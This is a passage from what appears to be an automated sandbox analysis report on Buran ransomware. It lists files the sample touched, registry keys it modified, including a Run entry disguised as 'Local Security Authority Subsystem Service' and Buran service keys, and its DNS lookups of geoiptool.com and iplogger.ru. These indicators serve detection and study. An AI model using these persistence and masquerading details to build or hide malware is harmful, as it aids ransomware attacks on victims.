  1440. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif",
  1441. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif",
  1442. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif",
  1443. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar",
  1444. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar",
  1445. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar",
  1446. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar",
  1447. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar",
  1448. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar",
  1449. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index",
  1450. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar",
  1451. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar",
  1452. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar",
  1453. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar",
  1454. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar",
  1455. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar",
  1456. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf",
  1457. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf",
  1458. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf",
  1459. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf",
  1460. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf",
  1461. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf",
  1462. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf",
  1463. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf",
  1464. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties",
  1465. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif",
  1466. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif",
  1467. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif",
  1468. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif",
  1469. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif",
  1470. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif",
  1471. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif",
  1472. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc",
  1473. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc",
  1474. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access",
  1475. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template",
  1476. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties",
  1477. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template",
  1478. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist",
  1479. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs",
  1480. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts",
  1481. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy",
  1482. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security",
  1483. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy",
  1484. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar",
  1485. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar",
  1486. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar",
  1487. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar",
  1488. "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc",
  1489. "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt",
  1490. "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc",
  1491. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt",
  1492. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt",
  1493. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml",
  1494. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml",
  1495. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf",
  1496. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat",
  1497. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat",
  1498. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf",
  1499. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini",
  1500. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml",
  1501. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd",
  1502. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini",
  1503. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd",
  1504. "C:\\Program Files\\Notepad++\\contextMenu.xml",
  1505. "C:\\Program Files\\Notepad++\\functionList.xml",
  1506. "C:\\Program Files\\Notepad++\\langs.model.xml",
  1507. "C:\\Program Files\\Notepad++\\LICENSE"
  1508.  
  1509.  
  1510. * Modified Registry Keys:
  1511. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service",
  1512. "HKEY_CURRENT_USER\\Software\\Buran V\\Service",
  1513. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Public Key",
  1514. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Machine ID",
  1515. "HKEY_CURRENT_USER\\Software\\Buran V\\Knock",
  1516. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths",
  1517. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths\\0",
  1518. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
  1519. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DA0ED248-9EDB-4144-B9E7-AFC1D00A662A",
  1520. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
  1521. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\A14B62F8-6D27-44D8-BFCB-66F44117F2A4",
  1522. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
  1523. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\4C64B42C-C15C-4AFB-9A31-7317BC95FE05",
  1524. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\F7093373-6201-40B8-8D09-6E7E59E028EB",
  1525. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Registry Writer",
  1526. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\COM+ REGDB Writer",
  1527. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\ASR Writer",
  1528. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Shadow Copy Optimization Writer",
  1529. "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers",
  1530. "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\(Default)",
  1531. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DA0ED248-9EDB-4144-B9E7-AFC1D00A662A\\data",
  1532. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\A14B62F8-6D27-44D8-BFCB-66F44117F2A4\\data",
  1533. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\4C64B42C-C15C-4AFB-9A31-7317BC95FE05\\data",
  1534. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\F7093373-6201-40B8-8D09-6E7E59E028EB\\data"
  1535.  
  1536.  
  1537. * Deleted Registry Keys:
  1538.  
  1539. * DNS Communications:
  1540.  
  1541. "type": "A",
  1542. "request": "geoiptool.com",
  1543. "answers":
  1544.  
  1545.  
  1546. "type": "A",
  1547. "request": "iplogger.ru",
  1548. "answers":
  1549.  
  1550.  
  1551.  
  1552. * Domains:
  1553.  
  1554. "ip": "158.69.67.193",
  1555. "domain": "geoiptool.com"
  1556.  
  1557.  
  1558. "ip": "88.99.66.31",
  1559. "domain": "iplogger.ru"
  1560.  
  1561.  
  1562.  
  1563. * Network Communication - ICMP:
  1564.  
  1565. * Network Communication - HTTP:
  1566.  
  1567. * Network Communication - SMTP:
  1568.  
  1569. * Network Communication - Hosts:
  1570.  
  1571. * Network Communication - IRC: